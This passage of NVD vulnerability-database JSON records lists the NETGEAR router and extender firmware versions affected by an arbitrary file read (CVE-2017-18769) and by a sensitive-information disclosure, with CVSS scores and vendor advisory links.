"matchCriteriaId": "A1664969-D326-4EC5-BF0D-E43820CCB378",
"versionEndExcluding": "1.0.2.40",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r9000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "D74F1BFC-562E-4E7D-BBAB-2F8B593B5A57",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wndr3400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "DF8551B9-72D9-46B8-9F66-EE7841E29A26",
"versionEndExcluding": "1.0.1.14",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wndr3400:v3:*:*:*:*:*:*:*",
"matchCriteriaId": "1992E44C-122C-41BC-8FDC-5F9EBEE1FB7C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wndr3700_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "FAF6A089-4E7D-43D1-AF1F-01A7A592115E",
"versionEndExcluding": "1.0.2.96",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wndr3700:v4:*:*:*:*:*:*:*",
"matchCriteriaId": "257A5E68-8EDC-44F5-A85C-83A91C93CCE5",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wndr4300_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "EF96C0EB-8CB6-4C86-A9A2-A4C7AF58C97F",
"versionEndExcluding": "1.0.2.98",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wndr4300:v1:*:*:*:*:*:*:*",
"matchCriteriaId": "D99E146D-B278-4CA6-8156-7D9923015779",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wndr4300_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "8B1EBB8F-818F-4E04-BB25-A81C1C309CD0",
"versionEndExcluding": "1.0.0.48",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wndr4300:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "4428B145-B86D-4709-BBA9-64BDE7D35A25",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wndr4500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "9591B73B-93BF-4976-998B-0200C990EF6A",
"versionEndExcluding": "1.0.0.48",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wndr4500:v3:*:*:*:*:*:*:*",
"matchCriteriaId": "C31D6808-4103-4543-B7AB-84A79CD12006",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wnr3500l_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "7CE20879-71BC-433E-A8B0-D1004A016B34",
"versionEndExcluding": "1.2.0.44",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wnr3500l:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "C8DE4BFA-41DE-4748-ACC7-14362333A059",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Certain NETGEAR devices are affected by an attacker\u0027s ability to read arbitrary files. This affects D6220 before 1.0.0.40, D6400 before 1.0.0.74, D7000 before 1.0.1.60, D7800 before 1.0.1.34, D8500 before 1.0.3.39, DGN2200v4 before 1.0.0.94, DGN2200Bv4 before 1.0.0.94, EX6200v2 before 1.0.1.50, EX7000 before 1.0.0.56, JR6150 before 1.0.1.18, R6050 before 1.0.1.10J, R6100 before 1.0.1.16, R6150 before 1.0.1.10, R6220 before 1.1.0.50, R6250 before 1.0.4.12, R6300v2 before 1.0.4.12, R6400 before 1.0.1.24, R6400v2 before 1.0.2.32, R6700 before 1.0.1.26, R6700v2 before 1.2.0.4, R6800 before 1.0.1.10, R6900 before 1.0.1.26, R6900P before 1.0.0.58, R6900v2 before 1.2.0.4, R7000 before 1.0.9.6, R7000P before 1.0.0.58, R7100LG before 1.0.0.32, R7300 before 1.0.0.54, R7500 before 1.0.0.112, R7500v2 before 1.0.3.20, R7800 before 1.0.2.36, R7900 before 1.0.1.18, R8000 before 1.0.3.48, R8300 before 1.0.2.104, R8500 before 1.0.2.104, R9000 before 1.0.2.40, WNDR3400v3 before 1.0.1.14, WNDR3700v4 before 1.0.2.96, WNDR4300v1 before 1.0.2.98, WNDR4300v2 before 1.0.0.48, WNDR4500v3 before 1.0.0.48, and WNR3500Lv2 before 1.2.0.44."
},
{
"lang": "es",
"value": "Determinados dispositivos NETGEAR est\u00e1n afectados por una capacidad del atacante para leer archivos arbitrarios. Esto afecta a D6220 versiones anteriores a 1.0.0.40, D6400 versiones anteriores a 1.0.0.74, D7000 versiones anteriores a 1.0.1.60, D7800 versiones anteriores a 1.0.1.34, D8500 versiones anteriores a 1.0.3.39, DGN2200v4 versiones anteriores a 1.0.0.94, DGN2200Bv4 versiones anteriores a 1.0.0.94, EX6200v2 versiones anteriores a 1.0.1.50, EX7000 versiones anteriores a 1.0.0.56, JR6150 versiones anteriores a 1.0.1.18, R6050 versiones anteriores a 1.0.1.10J, R6100 versiones anteriores a 1.0.1.16, R6150 versiones anteriores a 1.0.1.10, R6220 versiones anteriores a 1.1.0.50, R6250 versiones anteriores a 1.0.4.12, R6300v2 versiones anteriores a 1.0.4.12, R6400 versiones anteriores a 1.0.1.24, R6400v2 versiones anteriores a 1.0.2.32, R6700 versiones anteriores a 1.0.1.26, R6700v2 versiones anteriores a 1.2.0.4, R6800 versiones anteriores a 1.0.1.10, R6900 versiones anteriores a 1.0.1.26, R6900P versiones anteriores a 1.0.0.58, R6900v2 versiones anteriores a 1.2.0.4, R7000 versiones anteriores a 1.0 .9.6, R7000P versiones anteriores a 1.0.0.58, R7100LG versiones anteriores a 1.0.0.32, R7300 versiones anteriores a 1.0.0.54, R7500 versiones anteriores a 1.0.0.112, R7500v2 versiones anteriores a 1.0.3.20, R7800 versiones anteriores a 1.0.2.36, R7900 versiones anteriores a 1.0.1.18, R8000 versiones anteriores a 1.0.3.48 , R8300 versiones anteriores a 1.0.2.104, R8500 versiones anteriores a 1.0.2.104, R9000 versiones anteriores a 1.0.2.40, WNDR3400v3 versiones anteriores a 1.0.1.14, WNDR3700v4 versiones anteriores a 1.0.2.96, WNDR4300v1 versiones anteriores a 1.0.2.98, WNDR4300v2 versiones anteriores a 1.0.0.48, WNDR4500v3 versiones anteriores a 1.0.0.48 y WNR3500Lv2 versiones anteriores a 1.2.0.44."
}
],
"id": "CVE-2017-18769",
"lastModified": "2024-11-21T03:20:52.507",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 2.1,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "NONE",
"vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
"exploitabilityScore": 3.9,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "PHYSICAL",
"availabilityImpact": "NONE",
"baseScore": 4.6,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.0"
},
"exploitabilityScore": 0.9,
"impactScore": 3.6,
"source": "cve@mitre.org",
"type": "Secondary"
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "PHYSICAL",
"availabilityImpact": "NONE",
"baseScore": 4.6,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 0.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2020-04-22T15:15:11.457",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "https://kb.netgear.com/000051474/Security-Advisory-for-Arbitrary-File-Read-on-Some-Routers-Gateways-and-Extenders-PSV-2016-0122"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://kb.netgear.com/000051474/Security-Advisory-for-Arbitrary-File-Read-on-Some-Routers-Gateways-and-Extenders-PSV-2016-0122"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-200"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2020-04-23 21:15
Modified
2024-11-21 04:02
Severity ?
Summary
Certain NETGEAR devices are affected by disclosure of sensitive information. This affects D1500 before 1.0.0.27, D500 before 1.0.0.27, D6100 before 1.0.0.58, D6200 before 1.1.00.30, D6220 before 1.0.0.46, D6400 before 1.0.0.82, D7000 before 1.0.1.68, D7000v2 before 1.0.0.51, D7800 before 1.0.1.42, D8500 before 1.0.3.42, DC112A before 1.0.0.40, DGN2200Bv4 before 1.0.0.102, DGN2200v4 before 1.0.0.102, JNR1010v2 before 1.1.0.54, JR6150 before 1.0.1.18, JWNR2010v5 before 1.1.0.54, PR2000 before 1.0.0.24, R6020 before 1.0.0.34, R6050 before 1.0.1.18, R6080 before 1.0.0.34, R6100 before 1.0.1.22, R6120 before 1.0.0.42, R6220 before 1.1.0.68, R6250 before 1.0.4.30, R6300v2 before 1.0.4.32, R6400 before 1.0.1.44, R6400v2 before 1.0.2.60, R6700 before 1.0.1.48, R6700v2 before 1.2.0.24, R6800 before 1.2.0.24, R6900 before 1.0.1.48, R6900P before 1.3.1.44, R6900v2 before 1.2.0.24, R7000 before 1.0.9.34, R7000P before 1.3.1.44, R7100LG before 1.0.0.48, R7300 before 1.0.0.68, R7500 before 1.0.0.124, R7500v2 before 1.0.3.38, R7900 before 1.0.2.16, R7900P before 1.4.1.24, R8000 before 1.0.4.18, R8000P before 1.4.1.24, R8300 before 1.0.2.122, R8500 before 1.0.2.122, WN3000RP before 1.0.0.68, WN3000RPv2 before 1.0.0.68, WNDR3400v3 before 1.0.1.18, WNDR3700v4 before 1.0.2.102, WNDR3700v5 before 1.1.0.54, WNDR4300v1 before 1.0.2.104, WNDR4300v2 before 1.0.0.56, WNDR4500v3 before 1.0.0.56, WNR1000v4 before 1.1.0.54, WNR2020 before 1.1.0.54, WNR2050 before 1.1.0.54, and WNR3500Lv2 before 1.2.0.54.
References
Impacted products
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d1500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "47DB7AAC-5EE3-4912-A44F-C9D5BF42B01C",
"versionEndExcluding": "1.0.0.27",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d1500:-:*:*:*:*:*:*:*",
"matchCriteriaId": "78DC8809-C26D-48D8-9E12-228C3669B824",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "3B5A5FCA-6198-4DF7-B395-F266C2B6270C",
"versionEndExcluding": "1.0.0.27",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d500:-:*:*:*:*:*:*:*",
"matchCriteriaId": "3CE070E3-C0B1-455F-83A9-5C60C489816F",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d6100_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "600F0894-2001-4681-8B7C-AE24B3C81EA4",
"versionEndExcluding": "1.0.0.58",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d6100:-:*:*:*:*:*:*:*",
"matchCriteriaId": "7EFD1E86-F100-4E46-935D-903EB6FEFE9D",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d6200_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "D4A922C9-1C6D-4694-AB9F-EDD285FEAA7C",
"versionEndExcluding": "1.1.00.30",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d6200:-:*:*:*:*:*:*:*",
"matchCriteriaId": "00E6A1B7-4732-4259-9B71-10FF0B56A16B",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d6220_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "E6ABD67D-F08A-4879-A497-EA3DF0A87D4B",
"versionEndExcluding": "1.0.0.46",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d6220:-:*:*:*:*:*:*:*",
"matchCriteriaId": "F3EEA190-2E9C-4586-BF81-B115532FBA23",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d6400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "E84B61C3-54CA-4127-AE6B-E63AB51E0C85",
"versionEndExcluding": "1.0.0.82",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d6400:-:*:*:*:*:*:*:*",
"matchCriteriaId": "7D30939B-86E3-4C78-9B05-686B4994C8B9",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d7000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "D127F467-E2D0-462C-B9E1-458CFFFAC062",
"versionEndExcluding": "1.0.1.68",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d7000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "AF04B65B-9685-4595-9C71-0F77AD7109BE",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d7000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "52FB0300-0FC9-4797-BACB-84D7D932A386",
"versionEndExcluding": "1.0.0.51",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d7000:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "D8780623-F362-4FA5-8B33-37E9CB3FEE12",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d7800_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "FCEAE442-EE2A-4F16-90FD-13369A0C972C",
"versionEndExcluding": "1.0.1.42",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d7800:-:*:*:*:*:*:*:*",
"matchCriteriaId": "DA2D4987-3726-4A72-8D32-592F59FAC46D",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d8500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "629E89E8-F329-4D11-9652-540752084DD3",
"versionEndExcluding": "1.0.3.42",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d8500:-:*:*:*:*:*:*:*",
"matchCriteriaId": "814A0114-9A1D-4EA0-9AF4-6968514E4F01",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:dc112a_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "D7587473-93CA-4998-9D73-0E936E425F23",
"versionEndExcluding": "1.0.0.40",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:dc112a:-:*:*:*:*:*:*:*",
"matchCriteriaId": "F87FFC46-137D-45B8-B437-F15565FB33D0",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:dgn2200b_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "15616D3A-6741-42CE-926D-171CB231C88D",
"versionEndExcluding": "1.0.0.102",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:dgn2200b:v4:*:*:*:*:*:*:*",
"matchCriteriaId": "25090794-A90C-40CD-8E95-87EC4E98B928",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:dgn2200_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "72004304-314A-4BE6-A33E-7F4CDF01FCEF",
"versionEndExcluding": "1.0.0.102",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:dgn2200:v4:*:*:*:*:*:*:*",
"matchCriteriaId": "099184A0-F1C6-4C3F-9C3B-F0B9AC0D4D14",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:jnr1010_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "9D6B82D8-DDCE-445C-A0FA-558701021A23",
"versionEndExcluding": "1.1.0.54",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:jnr1010:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "CCE79B3F-8667-43C9-962D-EE089428F144",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:jr6150_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "CC9C60BB-2E7F-4D35-9348-8D8AEFAAD75F",
"versionEndExcluding": "1.0.1.18",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:jr6150:-:*:*:*:*:*:*:*",
"matchCriteriaId": "D67167E5-81D2-4892-AF41-CBB6271232D1",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:jwnr2010_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "C9B596F0-BC6F-42CA-A3AD-7E2DD1AD423D",
"versionEndExcluding": "1.1.0.54",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:jwnr2010:v5:*:*:*:*:*:*:*",
"matchCriteriaId": "7399E5E9-40D8-4ECD-8B7B-C96A27E10282",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:pr2000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B03B4F14-ADF8-4316-BEB8-6092A5B94F5D",
"versionEndExcluding": "1.0.0.24",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:pr2000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "2451CC0C-71B2-474D-93F0-2B2ACD802FE3",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6020_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "973CBC26-395C-407F-937B-4E9D2DBE282C",
"versionEndExcluding": "1.0.0.34",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6020:-:*:*:*:*:*:*:*",
"matchCriteriaId": "5DDA7ABF-4C4B-4945-993A-F93BD8FCB55E",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6050_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "EDB0CD0A-A68D-4EF5-A938-6A15604C9107",
"versionEndExcluding": "1.0.1.18",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6050:-:*:*:*:*:*:*:*",
"matchCriteriaId": "363D4DEE-98B9-4294-B241-1613CAD1A3A7",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6080_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "38FE855A-C695-4D0B-98C8-1D09265F0092",
"versionEndExcluding": "1.0.0.34",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6080:-:*:*:*:*:*:*:*",
"matchCriteriaId": "1CEB5C49-53CF-44AE-9A7D-E7E6201BFE62",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6100_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "7FFFF63B-46C8-49BF-8494-BB3322F14594",
"versionEndExcluding": "1.0.1.22",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6100:-:*:*:*:*:*:*:*",
"matchCriteriaId": "9F44A123-B256-428B-98C2-17570F2F32DC",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6120_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "2C30A626-B5E2-48B1-A659-89E6EB167A8F",
"versionEndExcluding": "1.0.0.42",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6120:-:*:*:*:*:*:*:*",
"matchCriteriaId": "D18D2CCD-424F-41D5-919B-E22B9FA68D36",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6220_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "36187C87-B384-4042-8098-39738DB30A6F",
"versionEndExcluding": "1.1.0.68",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6220:-:*:*:*:*:*:*:*",
"matchCriteriaId": "B131B5C8-CB7F-433B-BA32-F05CE0E92A66",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6250_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "5DE93565-D893-4AB3-83A9-BCEFAF6547E0",
"versionEndExcluding": "1.0.4.30",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6250:-:*:*:*:*:*:*:*",
"matchCriteriaId": "321BE843-52C4-4638-A321-439CA7B3A6F2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6300_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "E997B769-B2F7-4BB5-A834-96A68EF842BA",
"versionEndExcluding": "1.0.4.32",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6300:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "10938043-F7DF-42C3-8C16-F92CAF8E5576",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "AF638167-B018-4140-B115-C65F387EFD77",
"versionEndExcluding": "1.0.1.44",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6400:-:*:*:*:*:*:*:*",
"matchCriteriaId": "3E4CDF6B-3829-44D0-9675-71D7BE83CAA2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "903EC8C1-0504-45B8-846C-8E1855A250E3",
"versionEndExcluding": "1.0.2.60",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6400:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "52AE9AD2-BC8D-477D-A3D3-891AE52FA5F3",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6700_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "732F20CF-135F-4CBF-988F-215B534994B1",
"versionEndExcluding": "1.0.1.48",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6700:-:*:*:*:*:*:*:*",
"matchCriteriaId": "21B27F11-4262-4CE1-8107-B365A7C152F2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6700_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "86F0E9CD-7AE4-4D58-828D-E958AC02B2A0",
"versionEndExcluding": "1.2.0.24",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6700:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "9F9706E6-CA53-43E4-91B0-D52655C86860",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6800_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "E30B4AA4-393B-4A84-AB64-3E087D473849",
"versionEndExcluding": "1.2.0.24",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6800:-:*:*:*:*:*:*:*",
"matchCriteriaId": "09404083-B00B-4C1F-8085-BC242E625CA3",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
